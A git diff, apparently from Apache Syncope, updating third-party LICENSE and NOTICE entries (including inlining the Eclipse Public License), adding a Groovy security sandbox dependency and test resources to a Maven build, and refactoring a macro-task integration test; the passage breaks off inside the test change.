-3. REQUIREMENTS
-
-A Contributor may choose to distribute the Program in object code form under
-its own license agreement, provided that:
-
-  a) it complies with the terms and conditions of this Agreement; and
-  b) its license agreement:
-      i) effectively disclaims on behalf of all Contributors all warranties
-         and conditions, express and implied, including warranties or
-         conditions of title and non-infringement, and implied warranties or
-         conditions of merchantability and fitness for a particular purpose;
-     ii) effectively excludes on behalf of all Contributors all liability for
-         damages, including direct, indirect, special, incidental and
-         consequential damages, such as lost profits;
-    iii) states that any provisions which differ from this Agreement are
-         offered by that Contributor alone and not by any other party; and
-     iv) states that source code for the Program is available from such
-         Contributor, and informs licensees how to obtain it in a reasonable
-         manner on or through a medium customarily used for software exchange.
-
-When the Program is made available in source code form:
-
-  a) it must be made available under this Agreement; and
-  b) a copy of this Agreement must be included with each copy of the Program.
-     Contributors may not remove or alter any copyright notices contained
-     within the Program.
-
-Each Contributor must identify itself as the originator of its Contribution,
-if
-any, in a manner that reasonably allows subsequent Recipients to identify the
-originator of the Contribution.
-
-4. COMMERCIAL DISTRIBUTION
-
-Commercial distributors of software may accept certain responsibilities with
-respect to end users, business partners and the like. While this license is
-intended to facilitate the commercial use of the Program, the Contributor who
-includes the Program in a commercial product offering should do so in a manner
-which does not create potential liability for other Contributors. Therefore,
-if a Contributor includes the Program in a commercial product offering, such
-Contributor ("Commercial Contributor") hereby agrees to defend and indemnify
-every other Contributor ("Indemnified Contributor") against any losses,
-damages and costs (collectively "Losses") arising from claims, lawsuits and
-other legal actions brought by a third party against the Indemnified
-Contributor to the extent caused by the acts or omissions of such Commercial
-Contributor in connection with its distribution of the Program in a commercial
-product offering. The obligations in this section do not apply to any claims
-or Losses relating to any actual or alleged intellectual property
-infringement. In order to qualify, an Indemnified Contributor must:
-a) promptly notify the Commercial Contributor in writing of such claim, and
-b) allow the Commercial Contributor to control, and cooperate with the
-Commercial Contributor in, the defense and any related settlement
-negotiations. The Indemnified Contributor may participate in any such claim at
-its own expense.
-
-For example, a Contributor might include the Program in a commercial product
-offering, Product X. That Contributor is then a Commercial Contributor. If
-that Commercial Contributor then makes performance claims, or offers
-warranties related to Product X, those performance claims and warranties are
-such Commercial Contributor's responsibility alone. Under this section, the
-Commercial Contributor would have to defend claims against the other
-Contributors related to those performance claims and warranties, and if a
-court requires any other Contributor to pay any damages as a result, the
-Commercial Contributor must pay those damages.
-
-5. NO WARRANTY
-
-EXCEPT AS EXPRESSLY SET FORTH IN THIS AGREEMENT, THE PROGRAM IS PROVIDED ON AN
-"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, EITHER EXPRESS OR
-IMPLIED INCLUDING, WITHOUT LIMITATION, ANY WARRANTIES OR CONDITIONS OF TITLE,
-NON-INFRINGEMENT, MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE. Each
-Recipient is solely responsible for determining the appropriateness of using
-and distributing the Program and assumes all risks associated with its
-exercise of rights under this Agreement , including but not limited to the
-risks and costs of program errors, compliance with applicable laws, damage to
-or loss of data, programs or equipment, and unavailability or interruption of
-operations.
-
-6. DISCLAIMER OF LIABILITY
-
-EXCEPT AS EXPRESSLY SET FORTH IN THIS AGREEMENT, NEITHER RECIPIENT NOR ANY
-CONTRIBUTORS SHALL HAVE ANY LIABILITY FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING WITHOUT LIMITATION
-LOST PROFITS), HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
-CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
-ARISING IN ANY WAY OUT OF THE USE OR DISTRIBUTION OF THE PROGRAM OR THE
-EXERCISE OF ANY RIGHTS GRANTED HEREUNDER, EVEN IF ADVISED OF THE POSSIBILITY
-OF SUCH DAMAGES.
-
-7. GENERAL
-
-If any provision of this Agreement is invalid or unenforceable under
-applicable law, it shall not affect the validity or enforceability of the
-remainder of the terms of this Agreement, and without further action by the
-parties hereto, such provision shall be reformed to the minimum extent
-necessary to make such provision valid and enforceable.
-
-If Recipient institutes patent litigation against any entity (including a
-cross-claim or counterclaim in a lawsuit) alleging that the Program itself
-(excluding combinations of the Program with other software or hardware)
-infringes such Recipient's patent(s), then such Recipient's rights granted
-under Section 2(b) shall terminate as of the date such litigation is filed.
-
-All Recipient's rights under this Agreement shall terminate if it fails to
-comply with any of the material terms or conditions of this Agreement and does
-not cure such failure in a reasonable period of time after becoming aware of
-such noncompliance. If all Recipient's rights under this Agreement terminate,
-Recipient agrees to cease use and distribution of the Program as soon as
-reasonably practicable. However, Recipient's obligations under this Agreement
-and any licenses granted by Recipient relating to the Program shall continue
-and survive.
-
-Everyone is permitted to copy and distribute copies of this Agreement, but in
-order to avoid inconsistency the Agreement is copyrighted and may only be
-modified in the following manner. The Agreement Steward reserves the right to
-publish new versions (including revisions) of this Agreement from time to
-time. No one other than the Agreement Steward has the right to modify this
-Agreement. The Eclipse Foundation is the initial Agreement Steward. The
-Eclipse Foundation may assign the responsibility to serve as the Agreement
-Steward to a suitable separate entity. Each new version of the Agreement will
-be given a distinguishing version number. The Program (including
-Contributions) may always be distributed subject to the version of the
-Agreement under which it was received. In addition, after a new version of the
-Agreement is published, Contributor may elect to distribute the Program
-(including its Contributions) under the new version. Except as expressly
-stated in Sections 2(a) and 2(b) above, Recipient receives no rights or
-licenses to the intellectual property of any Contributor under this Agreement,
-whether expressly, by implication, estoppel or otherwise. All rights in the
-Program not expressly granted under this Agreement are reserved.
-
-This Agreement is governed by the laws of the State of New York and the
-intellectual property laws of the United States of America. No party to this
-Agreement will bring a legal action under this Agreement more than one year
-after the cause of action arose. Each party waives its rights to a jury trial in
-any resulting litigation.
+For Microsoft Authentication Library (MSAL) for Java (https://github.com/AzureAD/microsoft-authentication-library-for-java):
+This is licensed under the MIT license, see above.
 
 ==
 
-For Microsoft Authentication Library (MSAL) for Java (https://github.com/AzureAD/microsoft-authentication-library-for-java):
-This is licensed under the MIT license, see above.
+For Spectator (https://github.com/Netflix/spectator):
+This is licensed under the AL 2.0, see above.
 
 ==
 
@@ -761,11 +572,21 @@ This is licensed under the AL 2.0, see above.
 
 ==
 
+For RabbitMQ Java Client (https://www.rabbitmq.com/java-client.html):
+This is licensed under the AL 2.0, see above.
+
+==
+
 For Java implementation of the Mustache template language (https://github.com/samskivert/jmustache):
 This is licensed under the BSD license, see above.
 
 ==
 
+For SignalFx client libraries (https://github.com/signalfx/signalfx-java):
+This is licensed under the AL 2.0, see above.
+
+==
+
 For Moshi (https://square.github.io/moshi/1.x):
 This is licensed under the AL 2.0, see above.
 
@@ -1207,6 +1028,11 @@ This is licensed under the BSD license, see above.
 
 ==
 
+For t-digest (https://github.com/tdunning/t-digest):
+This is licensed under the AL 2.0, see above.
+
+==
+
 For CBOR (https://github.com/peteroupc/CBOR-Java):
 This is licensed under the CC0 1.0, see above.
 
@@ -1222,6 +1048,11 @@ This is licensed under the BSD license, see above.
 
 ==
 
+For Wavefront's Java SDK (https://github.com/wavefrontHQ/wavefront-sdk-java):
+This is licensed under the AL 2.0, see above.
+
+==
+
 For Yubico (https://developers.yubico.com/):
 This is licensed under the BSD license, see above.
 
@@ -1317,6 +1148,11 @@ This is licensed under the BSD license, see above.
 
 ==
 
+For gmetric4j (https://github.com/ganglia/gmetric4j):
+This is licensed under the BSD license, see above.
+
+==
+
 For inherits (https://github.com/isaacs/inherits):
 This is licensed under the MIT license, see above.
 
@@ -1347,18 +1183,232 @@ This is licensed under the AL 2.0, see above.
 
 ==
 
+For Java Bindings for the OpenTelemetry Protocol (OTLP) (https://github.com/open-telemetry/opentelemetry-proto-java):
+This is licensed under the AL 2.0, see above.
+
+==
+
 For Project Reactor (https://projectreactor.io/):
 This is licensed under the AL 2.0, see above.
 
 ==
 
+For Prometheus Java Metrics Library (http://prometheus.github.io/client_java/):
+This is licensed under the AL 2.0, see above.
+
+==
+
 For Swagger (http://swagger.io/):
 This is licensed under the AL 2.0, see above.
 
 ==
 
 For Jakarta Annotations https://projects.eclipse.org/projects/ee4j.ca):
-This is licensed under the EPL 1.0, see above.
+This is licensed under the EPL 1.0:
+
+Eclipse Public License - v 1.0
+
+THE ACCOMPANYING PROGRAM IS PROVIDED UNDER THE TERMS OF THIS ECLIPSE PUBLIC
+LICENSE ("AGREEMENT"). ANY USE, REPRODUCTION OR DISTRIBUTION OF THE PROGRAM
+CONSTITUTES RECIPIENT'S ACCEPTANCE OF THIS AGREEMENT.
+
+1. DEFINITIONS
+
+"Contribution" means:
+
+a) in the case of the initial Contributor, the initial code and documentation
+   distributed under this Agreement, and
+b) in the case of each subsequent Contributor:
+    i) changes to the Program, and
+   ii) additions to the Program;
+
+   where such changes and/or additions to the Program originate from and are
+   distributed by that particular Contributor. A Contribution 'originates'
+   from a Contributor if it was added to the Program by such Contributor
+   itself or anyone acting on such Contributor's behalf. Contributions do not
+   include additions to the Program which: (i) are separate modules of
+   software distributed in conjunction with the Program under their own
+   license agreement, and (ii) are not derivative works of the Program.
+
+"Contributor" means any person or entity that distributes the Program.
+
+"Licensed Patents" mean patent claims licensable by a Contributor which are
+necessarily infringed by the use or sale of its Contribution alone or when
+combined with the Program.
+
+"Program" means the Contributions distributed in accordance with this
+Agreement.
+
+"Recipient" means anyone who receives the Program under this Agreement,
+including all Contributors.
+
+2. GRANT OF RIGHTS
+  a) Subject to the terms of this Agreement, each Contributor hereby grants
+     Recipient a non-exclusive, worldwide, royalty-free copyright license to
+     reproduce, prepare derivative works of, publicly display, publicly
+     perform, distribute and sublicense the Contribution of such Contributor,
+     if any, and such derivative works, in source code and object code form.
+  b) Subject to the terms of this Agreement, each Contributor hereby grants
+     Recipient a non-exclusive, worldwide, royalty-free patent license under
+     Licensed Patents to make, use, sell, offer to sell, import and otherwise
+     transfer the Contribution of such Contributor, if any, in source code and
+     object code form. This patent license shall apply to the combination of
+     the Contribution and the Program if, at the time the Contribution is
+     added by the Contributor, such addition of the Contribution causes such
+     combination to be covered by the Licensed Patents. The patent license
+     shall not apply to any other combinations which include the Contribution.
+     No hardware per se is licensed hereunder.
+  c) Recipient understands that although each Contributor grants the licenses
+     to its Contributions set forth herein, no assurances are provided by any
+     Contributor that the Program does not infringe the patent or other
+     intellectual property rights of any other entity. Each Contributor
+     disclaims any liability to Recipient for claims brought by any other
+     entity based on infringement of intellectual property rights or
+     otherwise. As a condition to exercising the rights and licenses granted
+     hereunder, each Recipient hereby assumes sole responsibility to secure
+     any other intellectual property rights needed, if any. For example, if a
+     third party patent license is required to allow Recipient to distribute
+     the Program, it is Recipient's responsibility to acquire that license
+     before distributing the Program.
+  d) Each Contributor represents that to its knowledge it has sufficient
+     copyright rights in its Contribution, if any, to grant the copyright
+     license set forth in this Agreement.
+
+3. REQUIREMENTS
+
+A Contributor may choose to distribute the Program in object code form under
+its own license agreement, provided that:
+
+  a) it complies with the terms and conditions of this Agreement; and
+  b) its license agreement:
+      i) effectively disclaims on behalf of all Contributors all warranties
+         and conditions, express and implied, including warranties or
+         conditions of title and non-infringement, and implied warranties or
+         conditions of merchantability and fitness for a particular purpose;
+     ii) effectively excludes on behalf of all Contributors all liability for
+         damages, including direct, indirect, special, incidental and
+         consequential damages, such as lost profits;
+    iii) states that any provisions which differ from this Agreement are
+         offered by that Contributor alone and not by any other party; and
+     iv) states that source code for the Program is available from such
+         Contributor, and informs licensees how to obtain it in a reasonable
+         manner on or through a medium customarily used for software exchange.
+
+When the Program is made available in source code form:
+
+  a) it must be made available under this Agreement; and
+  b) a copy of this Agreement must be included with each copy of the Program.
+     Contributors may not remove or alter any copyright notices contained
+     within the Program.
+
+Each Contributor must identify itself as the originator of its Contribution,
+if
+any, in a manner that reasonably allows subsequent Recipients to identify the
+originator of the Contribution.
+
+4. COMMERCIAL DISTRIBUTION
+
+Commercial distributors of software may accept certain responsibilities with
+respect to end users, business partners and the like. While this license is
+intended to facilitate the commercial use of the Program, the Contributor who
+includes the Program in a commercial product offering should do so in a manner
+which does not create potential liability for other Contributors. Therefore,
+if a Contributor includes the Program in a commercial product offering, such
+Contributor ("Commercial Contributor") hereby agrees to defend and indemnify
+every other Contributor ("Indemnified Contributor") against any losses,
+damages and costs (collectively "Losses") arising from claims, lawsuits and
+other legal actions brought by a third party against the Indemnified
+Contributor to the extent caused by the acts or omissions of such Commercial
+Contributor in connection with its distribution of the Program in a commercial
+product offering. The obligations in this section do not apply to any claims
+or Losses relating to any actual or alleged intellectual property
+infringement. In order to qualify, an Indemnified Contributor must:
+a) promptly notify the Commercial Contributor in writing of such claim, and
+b) allow the Commercial Contributor to control, and cooperate with the
+Commercial Contributor in, the defense and any related settlement
+negotiations. The Indemnified Contributor may participate in any such claim at
+its own expense.
+
+For example, a Contributor might include the Program in a commercial product
+offering, Product X. That Contributor is then a Commercial Contributor. If
+that Commercial Contributor then makes performance claims, or offers
+warranties related to Product X, those performance claims and warranties are
+such Commercial Contributor's responsibility alone. Under this section, the
+Commercial Contributor would have to defend claims against the other
+Contributors related to those performance claims and warranties, and if a
+court requires any other Contributor to pay any damages as a result, the
+Commercial Contributor must pay those damages.
+
+5. NO WARRANTY
+
+EXCEPT AS EXPRESSLY SET FORTH IN THIS AGREEMENT, THE PROGRAM IS PROVIDED ON AN
+"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, EITHER EXPRESS OR
+IMPLIED INCLUDING, WITHOUT LIMITATION, ANY WARRANTIES OR CONDITIONS OF TITLE,
+NON-INFRINGEMENT, MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE. Each
+Recipient is solely responsible for determining the appropriateness of using
+and distributing the Program and assumes all risks associated with its
+exercise of rights under this Agreement , including but not limited to the
+risks and costs of program errors, compliance with applicable laws, damage to
+or loss of data, programs or equipment, and unavailability or interruption of
+operations.
+
+6. DISCLAIMER OF LIABILITY
+
+EXCEPT AS EXPRESSLY SET FORTH IN THIS AGREEMENT, NEITHER RECIPIENT NOR ANY
+CONTRIBUTORS SHALL HAVE ANY LIABILITY FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING WITHOUT LIMITATION
+LOST PROFITS), HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ARISING IN ANY WAY OUT OF THE USE OR DISTRIBUTION OF THE PROGRAM OR THE
+EXERCISE OF ANY RIGHTS GRANTED HEREUNDER, EVEN IF ADVISED OF THE POSSIBILITY
+OF SUCH DAMAGES.
+
+7. GENERAL
+
+If any provision of this Agreement is invalid or unenforceable under
+applicable law, it shall not affect the validity or enforceability of the
+remainder of the terms of this Agreement, and without further action by the
+parties hereto, such provision shall be reformed to the minimum extent
+necessary to make such provision valid and enforceable.
+
+If Recipient institutes patent litigation against any entity (including a
+cross-claim or counterclaim in a lawsuit) alleging that the Program itself
+(excluding combinations of the Program with other software or hardware)
+infringes such Recipient's patent(s), then such Recipient's rights granted
+under Section 2(b) shall terminate as of the date such litigation is filed.
+
+All Recipient's rights under this Agreement shall terminate if it fails to
+comply with any of the material terms or conditions of this Agreement and does
+not cure such failure in a reasonable period of time after becoming aware of
+such noncompliance. If all Recipient's rights under this Agreement terminate,
+Recipient agrees to cease use and distribution of the Program as soon as
+reasonably practicable. However, Recipient's obligations under this Agreement
+and any licenses granted by Recipient relating to the Program shall continue
+and survive.
+
+Everyone is permitted to copy and distribute copies of this Agreement, but in
+order to avoid inconsistency the Agreement is copyrighted and may only be
+modified in the following manner. The Agreement Steward reserves the right to
+publish new versions (including revisions) of this Agreement from time to
+time. No one other than the Agreement Steward has the right to modify this
+Agreement. The Eclipse Foundation is the initial Agreement Steward. The
+Eclipse Foundation may assign the responsibility to serve as the Agreement
+Steward to a suitable separate entity. Each new version of the Agreement will
+be given a distinguishing version number. The Program (including
+Contributions) may always be distributed subject to the version of the
+Agreement under which it was received. In addition, after a new version of the
+Agreement is published, Contributor may elect to distribute the Program
+(including its Contributions) under the new version. Except as expressly
+stated in Sections 2(a) and 2(b) above, Recipient receives no rights or
+licenses to the intellectual property of any Contributor under this Agreement,
+whether expressly, by implication, estoppel or otherwise. All rights in the
+Program not expressly granted under this Agreement are reserved.
+
+This Agreement is governed by the laws of the State of New York and the
+intellectual property laws of the United States of America. No party to this
+Agreement will bring a legal action under this Agreement more than one year
+after the cause of action arose. Each party waives its rights to a jury trial in
+any resulting litigation.
 
 ==
 
@@ -1367,6 +1417,11 @@ This is licensed under the EPL 1.0, see above.
 
 ==
 
+For Jakarta Messaging (https://projects.eclipse.org/projects/ee4j.messaging):
+This is licensed under the EPL 1.0, see above.
+
+==
+
 For Jakarta Mail (https://projects.eclipse.org/projects/ee4j.mail):
 This is licensed under the EPL 1.0, see above.
 
@@ -1382,22 +1437,22 @@ This is licensed under the EPL 1.0, see above.
 
 ==
 
-For Jakarta Transactions (https://projects.eclipse.org/projects/ee4j.jta):
+For Jakarta Servlet (https://projects.eclipse.org/projects/ee4j.servlet):
 This is licensed under the EPL 1.0, see above.
 
 ==
 
-For Eclipse Project for JAX-RS (https://projects.eclipse.org/projects/ee4j.jaxrs):
+For Jakarta Transactions (https://projects.eclipse.org/projects/ee4j.jta):
 This is licensed under the EPL 1.0, see above.
 
 ==
 
-For Bean Validation API (http://beanvalidation.org/):
-This is licensed under the AL 2.0, see above.
+For Eclipse Project for JAX-RS (https://projects.eclipse.org/projects/ee4j.jaxrs):
+This is licensed under the EPL 1.0, see above.
 
 ==
 
-For Joda Time (http://www.joda.org/joda-time/):
+For Bean Validation API (http://beanvalidation.org/):
 This is licensed under the AL 2.0, see above.
 
 ==
@@ -1422,6 +1477,11 @@ This is licensed under the MIT license, see above.
 
 ==
 
+For Byte Buddy (https://bytebuddy.net/):
+This is licensed under the AL 2.0, see above.
+
+==
+
 For TypeTools (https://github.com/jhalterman/typetools/):
 This is licensed under the AL 2.0, see above.
 
@@ -1487,11 +1547,6 @@ This is licensed under the MIT license, see above.
 
 ==
 
-For The Checker Framework (https://checkerframework.org/):
-This is licensed under the MIT license, see above.
-
-==
-
 For StAX2 API (http://wiki.fasterxml.com/WoodstoxStax2):
 This is licensed under the BSD license, see above.
 
@@ -1592,6 +1647,11 @@ This is licensed under the MIT license, see above.
 
 ==
 
+For JSpecify (https://jspecify.dev/):
+This is licensed under the AL 2.0, see above.
+
+==
+
 For LatencyUtils (https://latencyutils.github.io/LatencyUtils/):
 This is licensed under the CC0 1.0, see above.
 
@@ -1657,11 +1717,31 @@ This is licensed under the AL 2.0, see above.
 
 ==
 
+For zxcvbn (https://github.com/dropbox/zxcvbn):
+This is licensed under the MIT license, see above.
+
+==
+
 For SnakeYAML (http://www.snakeyaml.org/):
 This is licensed under the AL 2.0, see above.
 
 ==
 
+For AWS SDK for Java (https://aws.amazon.com/sdkforjava):
+This is licensed under the AL 2.0, see above.
+
+==
+
+For AWS EventStream for Java (https://github.com/awslabs/aws-eventstream-java):
+This is licensed under the AL 2.0, see above.
+
+==
+
+For sweetalert2 (https://github.com/sweetalert2/sweetalert2):
+This is licensed under the MIT license, see above.
+
+==
+
 For text-encoding (https://github.com/inexorabletash/text-encoding):
 This is licensed under the AL 2.0, see above.
 
@@ -1672,10 +1752,15 @@ This is licensed under the BSD license, see above.
 
 ==
 
-For window.fetch polyfill (https://github.github.io/fetch/):
+For UAParser.js (https://github.com/faisalman/ua-parser-js):
 This is licensed under the MIT license, see above.
 
 ==
 
-For zxcvbn (https://github.com/dropbox/zxcvbn):
+For webjars-locator-lite (https://github.com/webjars/webjars-locator-lite/):
+This is licensed under the MIT license, see above.
+
+==
+
+For window.fetch polyfill (https://github.github.io/fetch/):
 This is licensed under the MIT license, see above.

@@ -9,6 +9,11 @@ with which this file is now or was at one time distributed.
 
 ==
 
+This product includes software developed by the Animate.css project.
+Copyright (c) 2016 Daniel Eden
+
+==
+
 This product includes software developed by balanced-match
 Copyright (c) 2013 Julian Gruber <julian@juliangruber.com>
 
@@ -96,13 +101,13 @@ This product includes software developed by J2ObjC: Java to Objective-C Translat
 
 ==
 
-This product includes software developed by ZXing
-Copyright: 2007-2020, ZXing authors
+This product includes software developed by Protocol Buffers
+Copyright 2008 Google Inc. All rights reserved.
 
 ==
 
-This product includes software developed by mchange-commons-java
-Copyright (C) 2015 Machinery For Change, Inc.
+This product includes software developed by ZXing
+Copyright: 2007-2020, ZXing authors
 
 ==
 
@@ -111,6 +116,11 @@ Copyright (c) Microsoft Corporation. All rights reserved.
 
 ==
 
+This product includes software developed by Spectator
+Copyright Netflix. All Rights Reserved.
+
+==
+
 This product includes software developed by Nimbus Content Type
 Copyright 2020, Connect2id Ltd
 
@@ -131,12 +141,22 @@ Copyright 2012-2022, Connect2id Ltd
 
 ==
 
+This product includes software developed by RabbitMQ Java Client
+Copyright (c) 2007-Present Pivotal Software, Inc.  All rights reserved.
+
+==
+
 This product includes software developed by Java implementation of the Mustache template language.
 Copyright (c) 2010, Michael Bayne
 All rights reserved.
 
 ==
 
+This product includes software developed by SignalFx client libraries
+Copyright © 2014-2023 SignalFx | Splunk
+
+==
+
 This product includes software developed by Moshi
 Copyright (C) 2020 Square, Inc.
 
@@ -172,6 +192,11 @@ Copyright (c) 2018, 2024 Oracle and/or its affiliates. All rights reserved.
 
 ==
 
+This product includes software developed by t-digest
+The code for the t-digest was originally authored by Ted Dunning
+
+==
+
 This product includes software developed by Semver4j
 Copyright (c) 2015-present Vincent DURMONT <vdurmont@gmail.com>
 
@@ -183,6 +208,11 @@ Copyright (c) 2014-2017 Enrico M. Crisostomo
 
 ==
 
+This product includes software developed by Wavefront's Java SDK
+Copyright (c) 2017-Present VMware, Inc. All Rights Reserved.
+
+==
+
 This product includes software developed by Yubico
 Copyright (c) 2014-2018, Yubico AB
 
@@ -267,6 +297,12 @@ Copyright (c) 2006, Ivan Sagalaev
 
 ==
 
+This product includes software developed by gmetric4j
+Copyright (C) 2010-2015 Daniel Pocock <daniel@pocock.com.au>
+Copyright (c) 2008-2011 Jasper Humphrey <jasper521@gmail.com>
+
+==
+
 This product includes software developed by inherits
 Copyright (c) 2011-2023 Isaac Z. Schlueter
 
@@ -297,6 +333,16 @@ Copyright 2014 The Netty Project
 
 ==
 
+This product includes software developed by Java Bindings for the OpenTelemetry Protocol (OTLP)
+Copyright The OpenTelemetry Authors
+
+==
+
+This product includes software developed by Prometheus Java Metrics Library
+Copyright 2012-2015 The Prometheus Authors
+
+==
+
 This product includes software developed by the Swagger project.
 Copyright 2016 SmartBear Software
 
@@ -312,6 +358,12 @@ Copyright (c) 1997, 2023 Oracle and/or its affiliates and others. All rights res
 
 ==
 
+This product includes software developed by the Eclipse Project for Jakarta Messaging.
+Copyright (c) 2017, 2020 Oracle and/or its affiliates. All rights reserved.
+Copyright 2021 Contributors to the Eclipse Foundation
+
+==
+
 This product includes software developed by the Eclipse Project for Jakarta Mail.
 Copyright (c) 1997, 2024 Oracle and/or its affiliates. All rights reserved.
 
@@ -328,6 +380,11 @@ Copyright (c) 2021-2024 Contributors to the Eclipse Foundation
 
 ==
 
+This product includes software developed by the Eclipse Project for Jakarta Servlet.
+Copyright (c) 1997, 2024 Oracle and/or its affiliates and others. All rights reserved.
+
+==
+
 This product includes software developed by the Eclipse Project for Jakarta Transactions.
 Copyright (c) 2012, 2020 Oracle and/or its affiliates. All rights reserved.
 
@@ -344,11 +401,6 @@ Copyright (c) Red Hat, Inc., Emmanuel Bernard
 
 ==
 
-This product includes software developed by the Joda Time project.
-Copyright (c) 2002-2016 Joda.org. All Rights Reserved.
-
-==
-
 This product includes the jQuery Core JavaScript Library.
 Copyright 2007, 2016 jQuery Foundation and other contributors.
 
@@ -364,6 +416,11 @@ Copyright (c) 2011 Gary Court
 
 ==
 
+This product includes software developed by Byte Buddy
+Copyright 2014 - Present Rafael Winterhalter
+
+==
+
 This product includes software developed by TypeTools.
 Copyright Jonathan Halterman and friends.
 
@@ -419,11 +476,6 @@ Copyright (c) 2000-2016 The Legion of the Bouncy Castle Inc. (http://www.bouncyc
 
 ==
 
-This product includes software developed by The Checker Framework.
-Copyright (c) 2004-present by the Checker Framework developers
-
-==
-
 This product includes software developed by the Stax 2 Extension API Project.
 
 ==
@@ -509,6 +561,11 @@ Copyright (c) 2009-2022 Jonathan Hedley
 
 ==
 
+This product includes software developed by JSpecify
+Copyright 2022 The JSpecify Authors.
+
+==
+
 This product includes software developed by Ldaptive Java Library
 Copyright (C) 2003-2021 Virginia Tech. All Rights Reserved.
 
@@ -558,19 +615,44 @@ Copyright 2012 Twitter, Inc.
 
 ==
 
+This product includes software developed by zxcvbn
+Copyright (c) 2012-2016 Dan Wheeler and Dropbox, Inc.
+
+==
+
 This product includes software developed by the SnakeYAML project.
 
 ==
 
+This product includes software developed by AWS SDK for Java
+Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
+
+==
+
+This product includes software developed by AWS EventStream for Java
+Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
+
+==
+
+This product includes software developed by sweetalert2
+Copyright (c) 2014 Tristan Edwards & Limon Monte
+
+==
+
 This product includes software developed by tslib
 Copyright (c) Microsoft Corporation.
 
 ==
 
-This product includes software developed by window.fetch polyfill
-Copyright (c) 2014-2016 GitHub, Inc.
+This product includes software developed by UAParser.js
+Copyright (c) 2012-2025 Faisal Salman <f@faisalman.com>
 
 ==
 
-This product includes software developed by zxcvbn
-Copyright (c) 2012-2016 Dan Wheeler and Dropbox, Inc.
+This product includes software developed by webjars-locator-lite
+Copyright (c) 2013 James Ward
+
+==
+
+This product includes software developed by window.fetch polyfill
+Copyright (c) 2014-2016 GitHub, Inc.

@@ -982,6 +982,11 @@ of liability.
 
 ==
 
+For Groovy Security Sandbox (https://github.com/Tirasa/groovy-security-sandbox:
+This is licensed under the MIT license, see above.
+
+==
+
 For jose.4.j (https://bitbucket.org/b_c/jose4j/):
 This is licensed under the AL 2.0, see above.
 
@@ -1002,6 +1007,11 @@ This is licensed under the AL 2.0, see above.
 
 ==
 
+For groovy-sandbox (https://github.com/craftercms/groovy-sandbox:
+This is licensed under the MIT license, see above.
+
+==
+
 For Eclipse Angus - Activation (https://eclipse-ee4j.github.io/angus-activation/):
 This is licensed under the EDL 1.0, see above.
 

@@ -121,6 +121,12 @@ Copyright 2011-2016 Tirasa S.r.l. All rights reserved.
 
 ==
 
+This product includes software developed by Groovy Security Sandbox
+Copyright (c) 2012-2020 Kohsuke Kawaguchi, CloudBees, Inc., other contributors
+Copyright (c) 2025 Tirasa
+
+==
+
 This product includes software developed by jose.4.j
 Copyright 2012-2015 Brian Campbell
 
@@ -139,6 +145,11 @@ This product includes software developed by the Woodstox Project.
 
 ==
 
+This product includes software developed by groovy-sandbox
+Copyright (c) 2012-2020 Kohsuke Kawaguchi, CloudBees, Inc., other contributors
+
+==
+
 This product includes software developed by the Eclipse Angus Project.
 Copyright (c) 1997, 2024 Oracle and/or its affiliates. All rights reserved.
 

@@ -170,6 +170,11 @@ under the License.
       <artifactId>groovy-sql</artifactId>
     </dependency>
 
+    <dependency>
+      <groupId>net.tirasa</groupId>
+      <artifactId>groovy-security-sandbox</artifactId>
+    </dependency>
+
     <dependency>
       <groupId>com.icegreen</groupId>
       <artifactId>greenmail</artifactId>

@@ -433,6 +433,12 @@ under the License.
           <include>errorMessages.properties</include>
         </includes>
       </testResource>
+      <testResource>
+        <directory>${basedir}/../../core/spring/src/test/resources</directory>
+        <includes>
+          <include>*.groovy</include>
+        </includes>
+      </testResource>
     </testResources>
   </build>
   
@@ -1632,7 +1638,7 @@ under the License.
               <images>
                 <image>
                   <alias>openldap</alias>
-                  <name>bitnami/openldap:2.6</name>
+                  <name>bitnamilegacy/openldap:2.6</name>
                   <run>
                     <env>
                       <LDAP_PORT_NUMBER>1389</LDAP_PORT_NUMBER>

@@ -26,8 +26,10 @@
 import static org.junit.jupiter.api.Assertions.fail;
 
 import jakarta.ws.rs.core.Response;
+import java.io.IOException;
 import java.nio.charset.StandardCharsets;
 import java.util.Locale;
+import java.util.UUID;
 import java.util.concurrent.TimeUnit;
 import org.apache.commons.io.IOUtils;
 import org.apache.syncope.common.lib.SyncopeClientException;
@@ -74,6 +76,27 @@ public class MacroTaskITCase extends AbstractITCase {
         TCA.setPrinterName("aprinter112");
     }
 
+    private static void createMacroActionsIfNeeded(final String key, final ImplementationEngine engine,
+            final String body) {
+        ImplementationTO macroActions = null;
+        try {
+            macroActions = IMPLEMENTATION_SERVICE.read(IdRepoImplementationType.MACRO_ACTIONS, key);
+        } catch (SyncopeClientException e) {
+            if (e.getType().getResponseStatus() == Response.Status.NOT_FOUND) {
+                macroActions = new ImplementationTO();
+                macroActions.setKey(key);
+                macroActions.setEngine(engine);
+                macroActions.setType(IdRepoImplementationType.MACRO_ACTIONS);
+                macroActions.setBody(body);
+                Response response = IMPLEMENTATION_SERVICE.create(macroActions);
+                macroActions = IMPLEMENTATION_SERVICE.read(
+                        macroActions.getType(), response.getHeaderString(RESTHeaders.RESOURCE_KEY));
+                assertNotNull(macroActions.getKey());
+            }
+        }
+        assertNotNull(macroActions);
+    }
+
     @BeforeAll
     public static void testCommandsSetup() throws Exception {
         CommandITCase.testCommandSetup();
@@ -98,24 +121,10 @@ public static void testCommandsSetup() throws Exception {
         }
         assertNotNull(command);
 
-        ImplementationTO macroActions = null;
-        try {
-            macroActions = IMPLEMENTATION_SERVICE.read(IdRepoImplementationType.MACRO_ACTIONS,
-                    TestMacroActions.class.getSimpleName());
-        } catch (SyncopeClientException e) {
